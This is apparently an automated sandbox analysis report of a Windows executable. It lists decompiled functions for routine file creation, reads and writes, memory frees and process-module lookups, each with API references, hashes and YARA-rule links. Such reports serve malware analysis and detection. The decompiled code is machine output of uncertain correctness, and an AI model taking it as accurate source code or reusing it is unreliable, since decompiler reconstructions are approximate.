                                                                                                                                                • GetStdHandle.KERNEL32(000000F5,?,?,00000000,00000002,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,74B04E00,?), ref: 0040972F
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,00000000,00000000,?,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,74B04E00,?), ref: 004097D2
                                                                                                                                                  • Part of subcall function 00405351: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040972A,?,?,?,00000000,00000002,?,?,00000001), ref: 00405363
                                                                                                                                                  • Part of subcall function 004053B1: GetLastError.KERNEL32(00000000,?,004097E7,00000000,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,74B04E00,?), ref: 004053C5
                                                                                                                                                  • Part of subcall function 004053B1: _snwprintf.MSVCRT ref: 004053F2
                                                                                                                                                  • Part of subcall function 004053B1: MessageBoxW.USER32(?,?,Error,00000030), ref: 0040540B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1161345128-0
                                                                                                                                                • Opcode ID: 1f12c5174dbf626df3c53de546eeba79fd62534e1c6cb3d42b78c857b20e2863
                                                                                                                                                • Instruction ID: 16bf936c0797f0b5653ba44e3a68d79ed8c61ea338f92f09e3d7ddd4fa5d63e9
                                                                                                                                                • Opcode Fuzzy Hash: 1f12c5174dbf626df3c53de546eeba79fd62534e1c6cb3d42b78c857b20e2863
                                                                                                                                                • Instruction Fuzzy Hash: ED218F32610200EBCB24AF66CC85A5F77A8EF44764F24853BF806B72C3DA7C9D418A59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00404689, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00404689(void** __ecx, void* __eflags, intOrPtr _a4, void* _a8) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				void* _t28;
				void** _t29;
				void* _t34;
				intOrPtr _t37;
				void* _t38;

				_t30 = __ecx;
				_v16 = _v16 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_t29 = __ecx;
				_v8 = 0x1388;
				E00406729( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x418)) + 0xec)),  &_v16);
				_t34 = _v16;
				if(E00404070(_t29, _t34, _a4) == 0) {
					_t37 = 0;
				} else {
					_t38 = _a8;
					if( *(_t34 + 0x24) != 1) {
						L6:
						__eflags =  *(_t34 + 0x24) & 0x00000004;
						if(( *(_t34 + 0x24) & 0x00000004) != 0) {
							_t25 = E0040460C(_t30, _t29, _t34, _t38); // executed
							goto L4;
						} else {
							memcpy(_t38, _t34,  *( *((intOrPtr*)(_t29 + 0x418)) + 0xec));
							_t37 = _a4;
						}
					} else {
						_t28 = E0040460C(_t30, _t29, _t34, _t38);
						_t44 = _t28;
						if(_t28 == 0) {
							goto L6;
						} else {
							_t25 = E00404689(_t29, _t44, _t28, _t38);
							L4:
							_t37 = _t25;
						}
					}
				}
				E00406710( &_v16);
				return _t37;
			}














                                                                                                                                                0x00404689
                                                                                                                                                0x0040468f
                                                                                                                                                0x00404693
                                                                                                                                                0x00404699
                                                                                                                                                0x004046ab
                                                                                                                                                0x004046b2
                                                                                                                                                0x004046ba
                                                                                                                                                0x004046c7
                                                                                                                                                0x00404725
                                                                                                                                                0x004046c9
                                                                                                                                                0x004046cd
                                                                                                                                                0x004046d0
                                                                                                                                                0x004046fa
                                                                                                                                                0x004046fa
                                                                                                                                                0x004046fe
                                                                                                                                                0x0040471e
                                                                                                                                                0x00000000
                                                                                                                                                0x00404700
                                                                                                                                                0x0040470e
                                                                                                                                                0x00404713
                                                                                                                                                0x00404716
                                                                                                                                                0x004046d2
                                                                                                                                                0x004046d5
                                                                                                                                                0x004046da
                                                                                                                                                0x004046dc
                                                                                                                                                0x00000000
                                                                                                                                                0x004046de
                                                                                                                                                0x004046e2
                                                                                                                                                0x004046e7
                                                                                                                                                0x004046e7
                                                                                                                                                0x004046e7
                                                                                                                                                0x004046dc
                                                                                                                                                0x004046d0
                                                                                                                                                0x004046ec
                                                                                                                                                0x004046f7

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406729: ??3@YAXPAX@Z.MSVCRT ref: 00406730
                                                                                                                                                  • Part of subcall function 00406729: ??2@YAPAXI@Z.MSVCRT ref: 0040673E
                                                                                                                                                  • Part of subcall function 00404070: SetFilePointerEx.KERNELBASE(F@@,?,?,00000000,00000000,00000000,004046C5,00000000,00000000,?,00000000,F@@), ref: 0040408C
                                                                                                                                                • memcpy.MSVCRT ref: 0040470E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@FilePointermemcpy
                                                                                                                                                • String ID: F@@
                                                                                                                                                • API String ID: 402491248-234039029
                                                                                                                                                • Opcode ID: a2a877243d3c89850b15c365e55990fc21c52ff07033efc540406eb1b4e16218
                                                                                                                                                • Instruction ID: c3572d9dbfcd3884a1c52f4e364fbd30e8829f125a260a26c36de24cb81dc24a
                                                                                                                                                • Opcode Fuzzy Hash: a2a877243d3c89850b15c365e55990fc21c52ff07033efc540406eb1b4e16218
                                                                                                                                                • Instruction Fuzzy Hash: 9211C4B2900114B7DB109B968844F9FBBAC9F86358F05847ABE0677282D67DA905C7EC
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040BC51, Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                			E0040BC51(intOrPtr* __edi, void* __eflags) {
				void* __esi;
				void* _t10;
				intOrPtr* _t13;
				signed int* _t16;

				_t13 = __edi;
				_push( *((intOrPtr*)(__edi + 0x698)));
				 *__edi = 0x410438; // executed
				L0040E032(); // executed
				_t11 = __edi + 0x6c4;
				 *((intOrPtr*)(__edi + 0x6c4)) = 0x40f7b8;
				E00403F55(_t11 + 0x54);
				E00401357(_t11);
				E00406355(__edi + 0x6ac);
				_t16 = __edi + 0x694;
				_t10 =  *_t16;
				if(_t10 != 0) {
					_t10 = DeleteObject(_t10);
					 *_t16 =  *_t16 & 0x00000000;
				}
				 *_t13 = 0x40f468;
				return _t10;
			}







                                                                                                                                                0x0040bc51
                                                                                                                                                0x0040bc53
                                                                                                                                                0x0040bc59
                                                                                                                                                0x0040bc5f
                                                                                                                                                0x0040bc64
                                                                                                                                                0x0040bc6e
                                                                                                                                                0x0040bc74
                                                                                                                                                0x0040bc7b
                                                                                                                                                0x0040bc86
                                                                                                                                                0x0040bc8b
                                                                                                                                                0x0040bc91
                                                                                                                                                0x0040bc95
                                                                                                                                                0x0040bc98
                                                                                                                                                0x0040bc9e
                                                                                                                                                0x0040bc9e
                                                                                                                                                0x0040bca2
                                                                                                                                                0x0040bca9

                                                                                                                                                APIs
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040BC5F
                                                                                                                                                  • Part of subcall function 00403F55: free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C
                                                                                                                                                  • Part of subcall function 00406355: free.MSVCRT(00000000,004065BB,74B04E00,?,00000000), ref: 0040635C
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 0040BC98
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$??3@DeleteObject
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2012871476-0
                                                                                                                                                • Opcode ID: d09d73ff1a65a7cf09805e5a43c409f63e09c8c95696eb59a3148a3799248faa
                                                                                                                                                • Instruction ID: 0aef1c026dc6713788bae9d6eb068f8a37dce8dfc4f8d72ecede120d92fabf63
                                                                                                                                                • Opcode Fuzzy Hash: d09d73ff1a65a7cf09805e5a43c409f63e09c8c95696eb59a3148a3799248faa
                                                                                                                                                • Instruction Fuzzy Hash: A8F0E5711002129FDB20BF35D8806C1B7E8FF41314F10403AE85977581CB79B478CA99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040536A, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040536A(void* _a4, void* _a8) {
				long _v8;
				int _t8;

				_t8 = WriteFile(_a4, _a8, wcslen(_a8) + _t6,  &_v8, 0); // executed
				return _t8;
			}





                                                                                                                                                0x00405386
                                                                                                                                                0x0040538d

                                                                                                                                                APIs
                                                                                                                                                • wcslen.MSVCRT ref: 00405377
                                                                                                                                                • WriteFile.KERNELBASE(?,00000003,00000000,00000001,00000000,?,?,00408878,?,00000003,?,00409C9C,?,[,?,0040977A), ref: 00405386
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileWritewcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3657313286-0
                                                                                                                                                • Opcode ID: 9602672fe1690bd860651872230ab81ccb290f1b65c84329dc0bcfd5fae289e8
                                                                                                                                                • Instruction ID: 0c605581e95f6f9092e1dff17d412b80520820f1d5211188770866c3677ad8a7
                                                                                                                                                • Opcode Fuzzy Hash: 9602672fe1690bd860651872230ab81ccb290f1b65c84329dc0bcfd5fae289e8
                                                                                                                                                • Instruction Fuzzy Hash: 19D09271100108BFEB119B51EC06EA93BADEB00268F108035B904981A1DAB6AE559B64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00406729, Relevance: 3.0, APIs: 2, Instructions: 16COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 80%
                                                                                                                                                			E00406729(signed int __edi, signed int* __esi) {
				signed int _t4;
				signed int _t9;
				signed int* _t10;

				_t10 = __esi;
				_t9 = __edi;
				_t4 =  *__esi;
				if(_t4 != 0) {
					_push(_t4);
					L0040E032();
					 *__esi =  *__esi & 0x00000000;
					__esi[1] = __esi[1] & 0x00000000;
				}
				_push(_t9); // executed
				L0040E038(); // executed
				 *_t10 = _t4;
				_t10[1] = _t9;
				return 1;
			}






                                                                                                                                                0x00406729
                                                                                                                                                0x00406729
                                                                                                                                                0x00406729
                                                                                                                                                0x0040672d
                                                                                                                                                0x0040672f
                                                                                                                                                0x00406730
                                                                                                                                                0x00406735
                                                                                                                                                0x00406738
                                                                                                                                                0x0040673c
                                                                                                                                                0x0040673d
                                                                                                                                                0x0040673e
                                                                                                                                                0x00406743
                                                                                                                                                0x00406748
                                                                                                                                                0x0040674c

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1936579350-0
                                                                                                                                                • Opcode ID: d04ff0e86415aacd890a32ca8a69411fdf4c08b78325983762dc897493c55298
                                                                                                                                                • Instruction ID: c90c2ba6e28998f2d5eed0bd3ccee310cae7302d4f530886d19d51dc87062eb8
                                                                                                                                                • Opcode Fuzzy Hash: d04ff0e86415aacd890a32ca8a69411fdf4c08b78325983762dc897493c55298
                                                                                                                                                • Instruction Fuzzy Hash: 1BD052B24102008BE3309F36C401726B2E8AF20726F208C2EE0D1E20C0EBB898508B18
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040623E, Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040623E(intOrPtr* __esi) {

				free( *(__esi + 0x10)); // executed
				free( *(__esi + 0xc));
				 *((intOrPtr*)(__esi)) = 0;
				 *((intOrPtr*)(__esi + 4)) = 0;
				 *(__esi + 0xc) = 0;
				 *(__esi + 0x10) = 0;
				 *((intOrPtr*)(__esi + 0x1c)) = 0;
				 *((intOrPtr*)(__esi + 8)) = 0;
				return 0;
			}



                                                                                                                                                0x00406241
                                                                                                                                                0x00406249
                                                                                                                                                0x00406252
                                                                                                                                                0x00406254
                                                                                                                                                0x00406257
                                                                                                                                                0x0040625a
                                                                                                                                                0x0040625d
                                                                                                                                                0x00406260
                                                                                                                                                0x00406263

                                                                                                                                                APIs
                                                                                                                                                • free.MSVCRT(?,004064D9,74B04E00,?,00000000), ref: 00406241
                                                                                                                                                • free.MSVCRT(?,?,004064D9,74B04E00,?,00000000), ref: 00406249
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                • Opcode ID: 76f590108307dae64c078041f874814435b3e422dbb17f3958c47c4fcdcab9e9
                                                                                                                                                • Instruction ID: 28e7de91d8c6fb9b9a7e9865330149758d7ef971e5f4142975db03b93ce30916
                                                                                                                                                • Opcode Fuzzy Hash: 76f590108307dae64c078041f874814435b3e422dbb17f3958c47c4fcdcab9e9
                                                                                                                                                • Instruction Fuzzy Hash: 87D042B0904B008EC7B0DF3AD401A06BBF0BB083103108D3ED0EAD2A60EB75A0149F04
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040D68E, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetPrivateProfileIntW.KERNEL32 ref: 0040D6B5
                                                                                                                                                  • Part of subcall function 0040D51E: memset.MSVCRT ref: 0040D53D
                                                                                                                                                  • Part of subcall function 0040D51E: _itow.MSVCRT ref: 0040D554
                                                                                                                                                  • Part of subcall function 0040D51E: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 0040D563
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4232544981-0
                                                                                                                                                • Opcode ID: c8bc426b99cd421d8e6c78dc9e9d0a6f713dc6b41d52eb42d39c1684d3183b59
                                                                                                                                                • Instruction ID: 52ff98ee44e8e581f616b19192f74a8057abb6c9a5cdde8826008456e78d844a
                                                                                                                                                • Opcode Fuzzy Hash: c8bc426b99cd421d8e6c78dc9e9d0a6f713dc6b41d52eb42d39c1684d3183b59
                                                                                                                                                • Instruction Fuzzy Hash: E9E0B632400209BFCF126F94EC01AAA3F66FF04318F148469FD5C14561D3369574AF48
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040D049, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                			E0040D049(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E0040D071(__eax);
				_t1 = _t10 + 0x14; // 0x8d000001
				_t6 =  *_t1;
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}







                                                                                                                                                0x0040d04a
                                                                                                                                                0x0040d04c
                                                                                                                                                0x0040d051
                                                                                                                                                0x0040d051
                                                                                                                                                0x0040d057
                                                                                                                                                0x00000000
                                                                                                                                                0x0040d06c
                                                                                                                                                0x0040d068
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040D071: LoadLibraryW.KERNELBASE(psapi.dll,0040C7D4,0040D051,74B059F0,0040CF75,?,?), ref: 0040D07C
                                                                                                                                                  • Part of subcall function 0040D071: GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040D090
                                                                                                                                                  • Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,EnumProcessModules), ref: 0040D09C
                                                                                                                                                  • Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,EnumProcessModulesEx), ref: 0040D0A8
                                                                                                                                                  • Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,GetModuleFileNameExW), ref: 0040D0B4
                                                                                                                                                  • Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,EnumProcesses), ref: 0040D0C0
                                                                                                                                                  • Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,GetModuleInformation), ref: 0040D0CC
                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,0040CF75,00000104,0040CF75,?,?), ref: 0040D068
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$FileLibraryLoadModuleName
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3821362017-0
                                                                                                                                                • Opcode ID: 1cf08a23b09b0d3d97ff26b013f401c3bd3ea652a3947e7a2b393679c14be32e
                                                                                                                                                • Instruction ID: 2a72a0c1e2ab3da33e39831b93c2ef8746b4f49573bf5205cfb9ee226a22e14b
                                                                                                                                                • Opcode Fuzzy Hash: 1cf08a23b09b0d3d97ff26b013f401c3bd3ea652a3947e7a2b393679c14be32e
                                                                                                                                                • Instruction Fuzzy Hash: DBD02231B14300ABE330EAF08C00F4BA6D86F40B18F008C3AB189F70D0C6B4C809531A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00405E43, Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00405E43(void* __ecx, void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t8;

				_v8 = _v8 & 0x00000000;
				_t8 = ReadFile(_a4, _a8, _a12,  &_v8, 0); // executed
				return _t8;
			}





                                                                                                                                                0x00405e47
                                                                                                                                                0x00405e5a
                                                                                                                                                0x00405e61

                                                                                                                                                APIs
                                                                                                                                                • ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040400E,00000000,?,00000400,?,00000000,00403B9A,?), ref: 00405E5A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                • Opcode ID: 010b72b188bcb63d068a0cd5cc08e11c66c185d99f429563d5beb6ad59adc6ad
                                                                                                                                                • Instruction ID: bef0590ae594767b07390076585e3b54dba5209a2ce075fea525828f997dfdeb
                                                                                                                                                • Opcode Fuzzy Hash: 010b72b188bcb63d068a0cd5cc08e11c66c185d99f429563d5beb6ad59adc6ad
                                                                                                                                                • Instruction Fuzzy Hash: B7D0C93141020DFBDF01CF80DD06FDD7B7DFB04359F104064BA10A5060D7759A14AB94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00405E62, Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00405E62(void* __ecx, void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t8;

				_v8 = _v8 & 0x00000000;
				_t8 = WriteFile(_a4, _a8, _a12,  &_v8, 0); // executed
				return _t8;
			}





                                                                                                                                                0x00405e66
                                                                                                                                                0x00405e79
                                                                                                                                                0x00405e80

                                                                                                                                                APIs
                                                                                                                                                • WriteFile.KERNELBASE(?,?,74B04E00,00000000,00000000,?,?,00409760,00000000,0040FF4C,00000002,?,?,00000001,0040BE1B,0040F454), ref: 00405E79
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                • Opcode ID: c5eb87db1ef907e83a15267b5f116f03c5c857c02999e1eac1b041104452b5ef
                                                                                                                                                • Instruction ID: e108cc57461cd09051f83d149da4ae7cbb94a9151abf142b08e99a69ba8f508e
                                                                                                                                                • Opcode Fuzzy Hash: c5eb87db1ef907e83a15267b5f116f03c5c857c02999e1eac1b041104452b5ef
                                                                                                                                                • Instruction Fuzzy Hash: 9DD0C93101020DFBDF01CF80DD06FDD7B7DEB04359F104064BA00A5060C7B59A14AB54
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00406710, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 84%
                                                                                                                                                			E00406710(signed int* __ecx) {
				signed int _t3;

				_t3 =  *__ecx;
				if(_t3 != 0) {
					_push(_t3); // executed
					L0040E032(); // executed
					 *__ecx =  *__ecx & 0x00000000;
					__ecx[1] = __ecx[1] & 0x00000000;
					return _t3;
				}
				return _t3;
			}




                                                                                                                                                0x00406713
                                                                                                                                                0x00406717
                                                                                                                                                0x00406719
                                                                                                                                                0x0040671a
                                                                                                                                                0x0040671f
                                                                                                                                                0x00406722
                                                                                                                                                0x00000000
                                                                                                                                                0x00406726
                                                                                                                                                0x00406728

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: 9bd186e89429b860fa5ddfbd94c8895d53f853a2d7264046d48f8f1e41839238
                                                                                                                                                • Instruction ID: 5339db72a64abfad3c15032fde593e64a1d815d69f9877ad78659c6e85a1ca85
                                                                                                                                                • Opcode Fuzzy Hash: 9bd186e89429b860fa5ddfbd94c8895d53f853a2d7264046d48f8f1e41839238
                                                                                                                                                • Instruction Fuzzy Hash: 13C012B28282214BE7345A29E80076262D89F14366F22082EE480A31C0DAB89C808658
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00405351, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00405351(WCHAR* _a4) {
				void* _t3;

				_t3 = CreateFileW(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
				return _t3;
			}




                                                                                                                                                0x00405363
                                                                                                                                                0x00405369

                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040972A,?,?,?,00000000,00000002,?,?,00000001), ref: 00405363
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                • Opcode ID: b680f323cfde0812eaa853d45ec535210a74fce6e52df2a6edf0fc9c67542069
                                                                                                                                                • Instruction ID: 1e51560ea2d226d7cbdf2b9922d616c5fe3e6071316244dee5f443afb53d0edf
